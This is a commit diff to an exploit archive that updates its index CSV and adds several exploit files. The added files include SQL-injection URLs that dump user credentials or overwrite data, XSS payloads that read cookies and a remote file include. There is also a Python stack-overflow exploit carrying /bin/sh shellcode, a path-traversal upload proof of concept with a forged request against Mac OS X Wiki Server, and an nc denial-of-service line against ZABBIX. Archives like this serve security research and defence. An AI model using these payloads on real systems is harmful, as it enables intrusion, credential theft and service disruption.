Updated 02_06_2014

files.csv

@@ -20458,7 +20458,7 @@ id,file,description,date,author,platform,type,port
 23243,platforms/windows/remote/23243.py,"Free Float FTP Server USER Command Buffer Overflow",2012-12-09,D35m0nd142,windows,remote,0
 23244,platforms/php/webapps/23244.txt,"WrenSoft Zoom Search Engine 2.0 Build: 1018 Cross-Site Scripting Vulnerability",2003-10-14,Ezhilan,php,webapps,0
 23245,platforms/linux/dos/23245.pl,"Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability",2003-10-15,"Oliver Karow",linux,dos,0
-23246,platforms/windows/dos/23246.txt,"Sumatra 2.1.1/MuPDF 1.0 Integer Overflow",2012-12-09,beford,windows,dos,0
+23246,platforms/windows/dos/23246.txt,"SumatraPDF 2.1.1/MuPDF 1.0 Integer Overflow",2012-12-09,beford,windows,dos,0
 23247,platforms/windows/remote/23247.c,"Microsoft Windows XP/2000 Messenger Service Buffer Overrun Vulnerability",2003-10-25,Adik,windows,remote,0
 23248,platforms/arm/dos/23248.txt,"Android Kernel 2.6 - Local DoS Crash PoC",2012-12-09,G13,arm,dos,0
 23249,platforms/php/webapps/23249.txt,"MyBB KingChat Plugin - Persistent XSS",2012-12-09,VipVince,php,webapps,0
@@ -28035,6 +28035,7 @@ id,file,description,date,author,platform,type,port
 31216,platforms/php/webapps/31216.txt,"Joomla! and Mambo com_scheduling Component 'id' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0
 31217,platforms/php/webapps/31217.txt,"BanPro DMS 1.0 'index.php' Local File Include Vulnerability",2008-02-16,muuratsalo,php,webapps,0
 31218,platforms/linux/dos/31218.txt,"freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service Vulnerability",2008-02-17,"Luigi Auriemma",linux,dos,0
+31220,platforms/linux/dos/31220.py,"MP3Info 0.8.5a - Buffer Overflow",2014-01-27,jsacco,linux,dos,0
 31221,platforms/windows/webapps/31221.txt,"Ability Mail Server 2013 - Password Reset CSRF from Stored XSS (Web UI)",2014-01-27,"David Um",windows,webapps,0
 31222,platforms/windows/dos/31222.py,"Oracle Outside In MDB - File Parsing Stack Based Buffer Overflow PoC",2014-01-27,Citadelo,windows,dos,0
 31223,platforms/multiple/dos/31223.txt,"Mozilla Thunderbird 17.0.6 - Input Validation Filter Bypass",2014-01-27,Vulnerability-Lab,multiple,dos,0
@@ -28083,6 +28084,7 @@ id,file,description,date,author,platform,type,port
 31268,platforms/php/webapps/31268.txt,"Spyce 2.1.3 spyce/examples/getpost.spy Name Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0
 31269,platforms/php/webapps/31269.txt,"Spyce 2.1.3 spyce/examples/formtag.spy Multiple Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0
 31270,platforms/php/webapps/31270.txt,"Spyce 2.1.3 spyce/examples/automaton.spy Direct Request Error Message Information Disclosure",2007-02-19,"Richard Brain",php,webapps,0
+31271,platforms/multiple/dos/31271.txt,"Sybase MobiLink 10.0.1.3629 - Multiple Heap Buffer Overflow Vulnerabilities",2008-02-20,"Luigi Auriemma",multiple,dos,0
 31272,platforms/php/webapps/31272.txt,"Joomla! and Mambo 'com_joomlavvz' Component 'id' Parameter SQL Injection Vulnerability",2008-02-20,S@BUN,php,webapps,0
 31273,platforms/php/webapps/31273.txt,"Joomla! and Mambo 'com_most' Component 'secid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0
 31274,platforms/php/webapps/31274.txt,"Joomla! and Mambo 'com_asortyment' Component 'katid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0
@@ -28096,6 +28098,7 @@ id,file,description,date,author,platform,type,port
 31282,platforms/php/webapps/31282.txt,"XOOPS Tiny Event 1.01 'print' Option SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0
 31283,platforms/php/webapps/31283.txt,"PHP-Nuke Downloads Module 'sid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0
 31284,platforms/php/webapps/31284.txt,"XOOPS 'prayerlist' Module 'cid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0
+31285,platforms/multiple/dos/31285.txt,"Zilab Chat and Instant Messaging (ZIM) 2.0/2.1 - Server Multiple Vulnerabilities",2008-02-21,"Luigi Auriemma",multiple,dos,0
 31286,platforms/asp/webapps/31286.txt,"Citrix MetaFrame Web Manager 'login.asp' Cross-Site Scripting Vulnerability",2008-02-22,Handrix,asp,webapps,0
 31287,platforms/php/webapps/31287.txt,"PHP-Nuke Recipe Module 1.3 'recipeid' Parameter SQL Injection Vulnerability",2008-02-23,S@BUN,php,webapps,0
 31288,platforms/php/webapps/31288.txt,"Joomla! and Mambo 'com_hello_world' Component 'id' Parameter SQL Injection Vulnerability",2008-02-23,S@BUN,php,webapps,0
@@ -28110,6 +28113,8 @@ id,file,description,date,author,platform,type,port
 31297,platforms/php/webapps/31297.txt,"PHP-Nuke Sell Module 'cid' Parameter SQL Injection Vulnerability",2008-02-25,"Aria-Security Team",php,webapps,0
 31298,platforms/hardware/remote/31298.txt,"Packeteer PacketShaper and PolicyCenter 8.2.2 'FILELIST' Parameter Cross-Site Scripting Vulnerability",2008-02-25,nnposter,hardware,remote,0
 31299,platforms/jsp/webapps/31299.txt,"Alkacon OpenCms 7.0.3 'tree_files.jsp' Cross-Site Scripting Vulnerability",2008-02-25,nnposter,jsp,webapps,0
+31300,platforms/windows/dos/31300.txt,"SurgeMail and WebMail <= 3.0 - 'Page' Command Remote Format String Vulnerability",2008-02-25,"Luigi Auriemma",windows,dos,0
+31301,platforms/windows/dos/31301.txt,"SurgeMail 3.0 - Real CGI executables Remote Buffer Overflow Vulnerability",2008-02-25,"Luigi Auriemma",windows,dos,0
 31302,platforms/windows/dos/31302.txt,"SurgeFTP 2.3a2 'Content-Length' Parameter NULL Pointer Denial Of Service Vulnerability",2008-02-25,"Luigi Auriemma",windows,dos,0
 31303,platforms/php/webapps/31303.txt,"Joomla! and Mambo 'com_inter' Component 'id' Parameter SQL Injection Vulnerability",2008-02-25,The-0utl4w,php,webapps,0
 31304,platforms/php/webapps/31304.txt,"Plume CMS 1.2.2 'manager/xmedia.php' Cross-Site Scripting Vulnerability",2008-02-21,"Omer Singer",php,webapps,0
@@ -28118,6 +28123,7 @@ id,file,description,date,author,platform,type,port
 31307,platforms/hardware/dos/31307.py,"Android Web Browser GIF File Heap-Based Buffer Overflow Vulnerability",2008-03-04,"Alfredo Ortega",hardware,dos,0
 31308,platforms/hardware/dos/31308.html,"Android Web Browser BMP File Integer Overflow Vulnerability",2008-03-04,"Alfredo Ortega",hardware,dos,0
 31309,platforms/linux/remote/31309.c,"Ghostscript 8.0.1/8.15 zseticcspace() Function Buffer Overflow Vulnerability",2008-02-27,"Will Drewry",linux,remote,0
+31310,platforms/windows/dos/31310.txt,"Trend Micro OfficeScan - Buffer Overflow Vulnerability and Denial of Service Vulnerability",2008-02-27,"Luigi Auriemma",windows,dos,0
 31311,platforms/hardware/remote/31311.txt,"Juniper Networks Secure Access 2000 'rdremediate.cgi' Cross Site Scripting Vulnerability",2008-02-28,"Richard Brain",hardware,remote,0
 31312,platforms/php/webapps/31312.txt,"Barryvan Compo Manager 0.3 'main.php' Remote File Include Vulnerability",2008-02-28,MhZ91,php,webapps,0
 31313,platforms/cgi/webapps/31313.txt,"Juniper Networks Secure Access 2000 Web Root Path Disclosure Vulnerability",2008-02-28,"Richard Brain",cgi,webapps,0
@@ -28134,8 +28140,10 @@ id,file,description,date,author,platform,type,port
 31324,platforms/php/webapps/31324.txt,"KC Wiki 1.0 minimal/wiki.php page Parameter Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0
 31325,platforms/php/webapps/31325.txt,"KC Wiki 1.0 simplest/wiki.php page Parameter Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0
 31326,platforms/php/webapps/31326.txt,"Flyspray 0.9.9 Information Disclosure, HTML Injection, and Cross-Site Scripting Vulnerabilities",2008-03-03,"Digital Security Research Group",php,webapps,0
+31327,platforms/multiple/dos/31327.txt,"Borland StarTeam 2008 10.0 .57 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",multiple,dos,0
 31328,platforms/php/webapps/31328.txt,"TorrentTrader 1.08 'msg' Parameter HTML Injection Vulnerability",2008-03-03,Dominus,php,webapps,0
 31329,platforms/multiple/webapps/31329..txt,"MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)",2014-02-01,@u0x,multiple,webapps,0
+31330,platforms/windows/dos/31330.txt,"Borland VisiBroker Smart Agent 08.00.00.C1.03 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",windows,dos,0
 31331,platforms/php/webapps/31331.txt,"PHP-Nuke eGallery 3.0 Module 'pid' Parameter SQL Injection Vulnerability",2008-03-04,"Aria-Security Team",php,webapps,0
 31332,platforms/php/webapps/31332.txt,"PHP-Nuke 'Seminars' Module 'fileName' Parameter Local File Include Vulnerability",2008-03-04,The-0utl4w,php,webapps,0
 31333,platforms/bsd/dos/31333.txt,"BSD PPP 'pppx.conf' Local Denial of Service Vulnerability",2008-03-04,sipherr,bsd,dos,0
@@ -28143,10 +28151,12 @@ id,file,description,date,author,platform,type,port
 31335,platforms/php/webapps/31335.txt,"MG2 'list' Parameter Cross-Site Scripting Vulnerability",2008-03-04,"Jose Carlos Norte",php,webapps,0
 31336,platforms/php/webapps/31336.txt,"Podcast Generator 0.96.2 'set_permissions.php' Cross-Site Scripting Vulnerability",2008-03-05,ZoRLu,php,webapps,0
 31337,platforms/php/webapps/31337.txt,"WebCT 4.1.5 Email and Discussion Board Messages HTML Injection Vulnerability",2007-06-25,Lupton,php,webapps,0
+31338,platforms/windows/dos/31338.txt,"Perforce Server 2007.3 - Multiple Remote Denial of Service Vulnerabilities",2008-03-05,"Luigi Auriemma",windows,dos,0
 31339,platforms/php/webapps/31339.txt,"PHP-Nuke Yellow_Pages Module 'cid' Parameter SQL Injection Vulnerability",2008-03-05,ZoRLu,php,webapps,0
 31340,platforms/hardware/remote/31340.html,"Check Point VPN-1 UTM Edge NGX 7.0.48x Login Page Cross-Site Scripting Vulnerability",2008-03-06,"Henri Lindberg",hardware,remote,0
 31341,platforms/php/webapps/31341.txt,"Yap Blog 1.1 'index.php' Remote File Include Vulnerability",2008-03-06,THE_MILLER,php,webapps,0
 31342,platforms/hardware/remote/31342.txt,"Airspan ProST WiMAX Device Web Interface Authentication Bypass Vulnerability",2008-03-06,"Francis Lacoste-Cordeau",hardware,remote,0
+31343,platforms/multiple/dos/31343.txt,"Sun Java Runtime Environment 1.x - Image Parsing Heap Buffer Overflow Vulnerability",2008-03-06,"Chris Evans",multiple,dos,0
 31344,platforms/php/webapps/31344.pl,"PHP-Nuke KutubiSitte Module 'kid' Parameter SQL Injection Vulnerability",2008-03-06,r080cy90r,php,webapps,0
 31345,platforms/windows/remote/31345.txt,"MicroWorld eScan Server 9.0.742 Directory Traversal Vulnerability",2008-03-06,"Luigi Auriemma",windows,remote,0
 31346,platforms/linux/local/31346.c,"Linux 3.4+ Arbitrary write with CONFIG_X86_X32",2014-02-02,saelo,linux,local,0
@@ -28160,7 +28170,10 @@ id,file,description,date,author,platform,type,port
 31357,platforms/php/webapps/31357.txt,"WordPress 2.3.2 wp-admin/invites.php to Parameter XSS",2008-03-07,Doz,php,webapps,0
 31358,platforms/php/webapps/31358.txt,"Specimen Image Database taxonservice.php dir Parameter Remote File Inclusion",2008-03-07,ZoRLu,php,webapps,0
 31359,platforms/windows/remote/31359.html,"Microsoft Internet Explorer 7.0 Combined JavaScript and XML Remote Information Disclosure Vulnerability",2008-03-07,"Ronald van den Heetkamp",windows,remote,0
+31360,platforms/windows/dos/31360.txt,"MailEnable 3.13 and Prior - IMAP Service Multiple Remote Vulnerabilities",2008-03-07,"Luigi Auriemma",windows,dos,0
+31361,platforms/windows/dos/31361.txt,"Microsoft Office 2000/2003/2004/XP - File Memory Corruption Vulnerability",2008-03-07,anonymous,windows,dos,0
 31362,platforms/multiple/remote/31362.txt,"Neptune Web Server 3.0 404 Error Page Cross Site Scripting Vulnerability",2008-03-07,NetJackal,multiple,remote,0
+31363,platforms/windows/dos/31363.txt,"Panda Internet Security/Antivirus+Firewall 2008 - CPoint.sys Memory Corruption Vulnerability",2008-03-08,"Tobias Klein",windows,dos,0
 31364,platforms/hardware/remote/31364.txt,"F5 BIG-IP 9.4.3 Web Management Interface Console HTML Injection Vulnerability",2008-03-08,nnposter,hardware,remote,0
 31365,platforms/php/webapps/31365.txt,"Alkacon OpenCMS 7.0.3 logfileViewSettings.jsp filePath Parameter XSS",2008-03-08,nnposter,php,webapps,0
 31366,platforms/php/webapps/31366.txt,"Alkacon OpenCMS 7.0.3 logfileViewSettings.jsp filePath.0 Parameter Arbitrary File Access",2008-03-08,nnposter,php,webapps,0
@@ -28178,6 +28191,7 @@ id,file,description,date,author,platform,type,port
 31378,platforms/multiple/dos/31378.txt,"RemotelyAnywhere 8.0.668 'Accept-Charset' Parameter NULL Pointer Denial Of Service Vulnerability",2008-03-10,"Luigi Auriemma",multiple,dos,0
 31379,platforms/php/webapps/31379.txt,"EncapsGallery 1.11.2 watermark.php file Parameter XSS",2008-03-10,ZoRLu,php,webapps,0
 31380,platforms/php/webapps/31380.txt,"EncapsGallery 1.11.2 catalog_watermark.php file Parameter XSS",2008-03-10,ZoRLu,php,webapps,0
+31381,platforms/windows/dos/31381.txt,"Motorola Timbuktu Pro 8.6.5 - Multiple Denial of Service Vulnerabilities",2008-03-10,"Luigi Auriemma",windows,dos,0
 31382,platforms/php/webapps/31382.txt,"Joomla! and Mambo 'ensenanzas' Component 'id' Parameter SQL Injection Vulnerability",2008-03-11,The-0utl4w,php,webapps,0
 31383,platforms/php/webapps/31383.txt,"PHP-Nuke NukeC30 3.0 Module 'id_catg' Parameter SQL Injection Vulnerability",2008-03-11,Houssamix,php,webapps,0
 31384,platforms/php/webapps/31384.txt,"PHP-Nuke zClassifieds Module 'cat' Parameter SQL Injection Vulnerability",2008-03-11,Lovebug,php,webapps,0
@@ -28191,3 +28205,17 @@ id,file,description,date,author,platform,type,port
 31394,platforms/windows/dos/31394.txt,"Cisco User-Changeable Password (UCP) 3.3.4.12.5 'CSuserCGI.exe' Multiple Remote Vulnerabilities",2008-03-12,felix,windows,dos,0
 31395,platforms/windows/remote/31395.txt,"Cisco User-Changeable Password (UCP) 3.3.4.12.5 CSUserCGI.exe Help Facility XSS",2008-03-12,felix,windows,remote,0
 31396,platforms/linux/remote/31396.txt,"Lighttpd 1.4.x mod_userdir Information Disclosure Vulnerability",2008-03-12,julien.cayzac,linux,remote,0
+31399,platforms/windows/dos/31399.txt,"McAfee Framework ePolicy 3.x - Orchestrator '_naimcomn_Log' Remote Format String Vulnerability",2008-03-12,"Luigi Auriemma",windows,dos,0
+31400,platforms/php/webapps/31400.txt,"XOOPS MyTutorials Module 2.1 'printpage.php' SQL Injection Vulnerability",2008-03-12,S@BUN,php,webapps,0
+31401,platforms/php/webapps/31401.txt,"Acyhost 'index.php' Remote File Include Vulnerability",2008-03-12,U238,php,webapps,0
+31402,platforms/php/webapps/31402.txt,"eWeather 'chart' Parameter Cross-Site Scripting Vulnerability",2008-03-12,NetJackal,php,webapps,0
+31403,platforms/unix/dos/31403.txt,"ZABBIX 1.1x/1.4.x File Checksum Request Denial of Service Vulnerability",2008-03-13,"Milen Rangelov",unix,dos,0
+31404,platforms/asp/webapps/31404.txt,"Virtual Support Office XP 2 'MyIssuesView.asp' SQL Injection Vulnerability",2008-03-13,The-0utl4w,asp,webapps,0
+31405,platforms/windows/remote/31405.c,"XnView 1.92.1 Command-Line Arguments Buffer Overflow Vulnerability",2014-02-05,"Sylvain THUAL",windows,remote,0
+31406,platforms/php/webapps/31406.txt,"SNewsCMS 2.x 'search.php' Cross-Site Scripting Vulnerability",2008-03-17,medprostuda.ru,php,webapps,0
+31407,platforms/windows/remote/31407.txt,"MG-SOFT Net Inspector 6.5.0.826 Multiple Remote Vulnerabilities",2008-03-17,"Luigi Auriemma",windows,remote,0
+31408,platforms/php/webapps/31408.txt,"Cfnetgs 0.24 'index.php' Cross-Site Scripting Vulnerability",2008-03-17,ZoRLu,php,webapps,0
+31409,platforms/windows/remote/31409.txt,"BootManage TFTP Server 1.99 - 'filename' Remote Buffer Overflow Vulnerability",2008-03-17,"Luigi Auriemma",windows,remote,0
+31410,platforms/php/webapps/31410.txt,"Joomla! and Mambo 'com_guide' Component 'category' Parameter SQL Injection Vulnerability",2008-03-17,The-0utl4w,php,webapps,0
+31411,platforms/cgi/webapps/31411.txt,"RSA WebID 5.3 'IISWebAgentIF.dll' Cross-Site Scripting Vulnerability",2008-03-17,quentin.berdugo,cgi,webapps,0
+31412,platforms/osx/remote/31412.txt,"Apple Mac OS X Server 10.5 Wiki Server Directory Traversal Vulnerability",2008-03-17,"Rodrigo Carvalho",osx,remote,0

platforms/asp/webapps/31404.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/28247/info
+
+Virtual Support Office XP (VSO-XP) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/MyIssuesView.asp?Issue_ID=-1%20having%201=1--
+http://www.example.com/MyIssuesView.asp?Issue_ID=-1 update QIssues set column='hacked';-- 

platforms/cgi/webapps/31411.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28277/info
+
+RSA WebID is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+RSA WebID 5.3 is vulnerable; other versions may also be affected. 
+
+https://www.example.com/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&authntype=2&username=a&passcode=a&postdata=aaa"%20><SCRIPT>alert(document.cookie)</script><!-- 

platforms/linux/dos/31220.py

@@ -0,0 +1,23 @@
+# Waste of CPU clock N2
+# Exploit for: mp3info! Latest version
+# Author: jsacco - jsacco@exploitpack.com
+# Vendor: http://ibiblio.org/mp3info/
+# No-one-cares-about programs!
+
+junk = "\x90\x90\x90\x90"*8 
+shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
+buffer = "\x90\x90\x90\x90"*89
+eip = "\x10\xf0\xff\xbf"
+
+print "# MP3info is prone to a Stack-BoF"
+print "# Wasting CPU clocks on unusable exploits"
+print "# This is exploit is for educational purposes"
+
+try:
+    subprocess.call(["mp3info", junk+shellcode+buffer+eip])
+except OSError as e:
+    if e.errno == os.errno.ENOENT:
+    	print "MP3Info not found!"
+    else:
+   	print "Error executing exploit" 
+    raise

platforms/multiple/dos/31271.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27914/info
+
+Sybase MobiLink is prone to multiple heap-based buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied data.
+
+A successful exploit will allow remote attackers to execute arbitrary code in the context of the affected software. Failed exploit attempts will likely result in denial-of-service conditions.
+
+These issues affect MobiLink 10.0.1.3629; prior versions may also be affected. 
+
+http://www.exploit-db.com/sploits/31271.zip

platforms/multiple/dos/31285.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27940/info
+
+Zilab Chat and Instant Messaging (ZIM) Server is prone to multiple vulnerabilities, including denial-of-service issues and memory-corruption issues.
+
+A successful exploit may allow remote attackers to execute arbitrary code in the context of the affected software and/or cause denial-of-service conditions.
+
+These issues affect ZIM Server 2.0 and 2.1; other versions may also be affected. 
+
+http://www.exploit-db.com/sploits/31285.zip

platforms/multiple/dos/31327.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/28080/info
+
+Borland StarTeam is prone to multiple issues, including multiple integer-overflow vulnerabilities, a heap-overflow vulnerability, and a denial-of-service vulnerability.
+
+Successfully exploiting these issues allows remote attackers to execute arbitrary machine code in the context of vulnerable server processes. These issues may facilitate the remote compromise of affected computers. Attackers may also trigger denial-of-service conditions.
+
+NOTE: The StarTeam MPX vulnerabilities may actually be related to a TIBCO SmartSocket DLL, but this has not been confirmed. We may update this BID as more information emerges.
+
+Borland StarTeam Server 2008 and MPX products are vulnerable to these issues; other versions may also be affected. 
+
+http://www.exploit-db.com/sploits/31327-1.zip
+http://www.exploit-db.com/sploits/31327-2.zip

platforms/multiple/dos/31343.txt

@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/28125/info
+
+Sun Java Runtime Environment is prone to a heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
+
+An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will likely crash the application.
+
+This issue affects the following products and versions:
+
+JDK and JRE 6 prior to Update 5
+JDK and JRE 5.0 prior to Update 15
+SDK and JRE prior to 1.4.2_17
+SDK and JRE prior to 1.3.1_22
+
+This vulnerability was previously covered in BID 28083 (Sun Java SE Multiple Security Vulnerabilities), but has been given its own record to better document the issue. 
+
+http://www.exploit-db.com/sploits/31343.jpg

platforms/osx/remote/31412.txt

@@ -0,0 +1,153 @@
+source: http://www.securityfocus.com/bid/28278/info
+
+Apple Mac OS X Server Wiki Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+Exploiting this issue allows an attacker to access arbitrary files outside of the application's document root directory. This can expose sensitive information that could help the attacker launch further attacks.
+
+Note that attackers must be registered wiki users to exploit this issue.
+
+Wiki Server from Mac OS X Server 10.5 is vulnerable.
+
+Next, we show a Proof of Concept (PoC) attack to the Leopard's Wiki
+Server. It creates a file 'popote.php' at '/tmp/[xxxxx]/' where
+'[xxxxx]' are random hexa characters assigned to the file, as we have
+said. You can write on all the folders where user '_teamsserver', the
+user running the Wiki Server, has permissions.
+
+For example, to reproduce the attack using Paros proxy [3], follow these
+steps:
+
+- Check the web server is up.
+- Check you have a system user/password in the system, for example
+guest, and the log in.
+- Start editing a new post in your blog.
+- Start Paros proxy, go to Trap tab and enable Trap requests checkbox.
+- Start uploading your preferred file, for example popote.php.
+- In Paros, press Continue until you find the POST request.
+- Append '../../../../../../..' at the beginning of 'popote.php' plus
+your wished path, for example '/tmp/'.
+- Press Continue a couple of times to send the request.
+- If user '_teamsserver' has permissions on the wished folder, you will
+write file 'popote.php' inside subfolder '[xxxxx]', where [xxxxx] are
+hash/random hexa characters that depend on the file.
+
+There are several strategies that can be used in combination with a
+path traversal to gain complete control of the victim's server, although
+we will not discuss them here.
+
+An example forged request follows:
+
+/-----------
+
+POST http://192.168.xxx.xxx/users/guest/weblog/3f081/attachments HTTP/1.0
+User-Agent: Opera/9.24 (Macintosh; Intel Mac OS X; U; en) Paros/3.2.13
+Host: 192.168.xxx.xxx
+Accept: text/html, application/xml;q=0.9, application/xhtml+xml,
+image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
+Accept-Language:
+en,ja;q=0.9,fr;q=0.8,de;q=0.7,es;q=0.6,it;q=0.5,nl;q=0.4,sv;q=0.3,nb;q=0.2,da;q=0.1,fi;q=0.1,pt;q=0.1,zh-CN;q=0.1,zh-TW;q=0.1,ko;q=0.1,ru;q=0.1,en;q=0.1
+Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
+Accept-Encoding: identity, *;q=0
+Referer: http://192.168.xxx.xxx/users/guest/weblog/3f081/
+Cookie: cookies=1; acl_cache=3; recentTags=add tags here;
+SQMSESSID=fe79c978b66bf3bf6d0c433abd6008a6;
+sessionID=75706E3C-FA5A-4535-85EA-0D69812D21D3; utcOffset=-3; uploadID=57904
+Cookie2: $Version=1
+Proxy-Connection: close
+Content-length: 426
+Content-Type: multipart/form-data; boundary=----------YN7xkbcuNgNx21psG30p21
+
+------------YN7xkbcuNgNx21psG30p21
+
+Content-Disposition: form-data; name="Attachment";
+filename="../../../../../../../tmp/popote.php"
+
+Content-Type: application/octet-stream
+
+
+
+<? phphinfo(); ?>
+
+
+  ------------YN7xkbcuNgNx21psG30p21
+
+  Content-Disposition: form-data; name="ok_button"
+
+
+
+  Attach
+
+  ------------YN7xkbcuNgNx21psG30p21
+
+  Content-Disposition: form-data; name="upload_id"
+
+
+
+  57904
+
+  ------------YN7xkbcuNgNx21psG30p21--
+
+-----------/
+
+
+    The vulnerable code is located at
+'/usr/share/wikid/lib/python/apple_wlt/ContentServer.py':
+
+
+/-----------
+
+def uploadFileCallback(self, result):
+        filename, filetype, aFile = result[1][self.type][0]
+        filename = filename.decode('utf-8')
+        filename = filename.split('\\')[-1] # IE sends the whole path,
+including your local username.
+        extension = filename.split('.')[-1]
+        oldFilename = filename
+        uploadType = os.path.split(self.fullpath)[-1]
+        if uploadType == "images":
+                filename = SettingsManager.findGoodName() + '.' + extension
+        logging.debug("beginning file upload: %s" % filename)
+        isImage = filenameIsImage(filename)
+        newPath = ImageUtilities.findUniqueFileName(os.path.join(self.fullpath,
+filename), isImage = (not uploadType == 'attachments'))
+        newFilename = os.path.basename(newPath)
+        if uploadType == "attachments":
+                newParentFolder = os.path.dirname(newPath)
+                os.mkdir(newParentFolder)
+                newFilename = os.path.join(os.path.basename(newParentFolder), filename)
+      [...]
+
+
+-----------/
+
+
+    The hash/random hexa characters used for the attachment subfolder
+are generated by code at
+'/usr/share/wikid/lib/python/apple_utilities/ImageUtilities.py':
+
+
+/-----------
+
+def findUniqueFileName(inPath, isImage = True):
+        """Uniqueifies a file name, to avoid duplicates in images and
+attachments"""
+        filename = os.path.basename(inPath)
+        base, extension = os.path.splitext(filename)
+        parent = os.path.dirname(inPath)
+        aPath = ''
+        mungedName = SettingsManager.findGoodName()
+        if not isImage:
+                #attachment, so make the minged name a subdirectory and put the file
+in that
+                aPath = os.path.join(parent, mungedName, filename)
+                while os.path.exists(aPath):
+                        mungedName = SettingsManager.findGoodName(mungedName)
+                        aPath = os.path.join(parent, mungedName, filename)
+        else:
+                aPath = os.path.join(parent, mungedName + extension)
+                while os.path.exists(aPath):
+                        mungedName = SettingsManager.findGoodName(mungedName)
+                        aPath = os.path.join(parent, mungedName + extension)
+        return aPath
+
+-----------/

platforms/php/webapps/31400.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/28230/info
+
+MyTutorials is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/modules/tutorials/printpage.php?tid=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),1,concat(uname,0x3a,pass),3,4,5/**/from/**/xoops_users/*
+http://www.example.com/modules/tutorials/index.php?op=printpage&tid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3/**/from/**/xoops_users/* 

platforms/php/webapps/31401.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28231/info
+
+Acyhost is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+http://www.example.com/index.php?sayfa=codeinject.txt 

platforms/php/webapps/31402.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28241/info
+
+eWeather is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+http://example.net/modules.php?name=eWeather&chart=%3Cscript%3Ealert(document.cookie)%3C/script%3E 

platforms/php/webapps/31406.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28262/info
+
+SNewsCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+SNewsCMS 2.3 and 2.4 are vulnerable to this issue; other versions may also be affected.
+
+http://www.example.com/search.php?query="><h1>XSS</h1> 

platforms/php/webapps/31408.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28267/info
+
+Cfnetgs is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Cfnetgs 0.24 is vulnerable to this issue; other versions may also be affected.
+
+http://www.example.com/photo/index.php?directory="><script>alert(document.cookie)</script> 

platforms/php/webapps/31410.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28271/info
+
+The 'guide' component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_guide&category=-999999/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/* 

platforms/unix/dos/31403.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28244/info
+
+ZABBIX is prone to a denial-of-service vulnerability when handling specially crafted requests for file checksums.
+
+An attacker can exploit this issue to cause the affected application to stop responding, denying service to legitimate users.
+
+echo "vfs.file.cksum[/dev/urandom]" | nc localhost
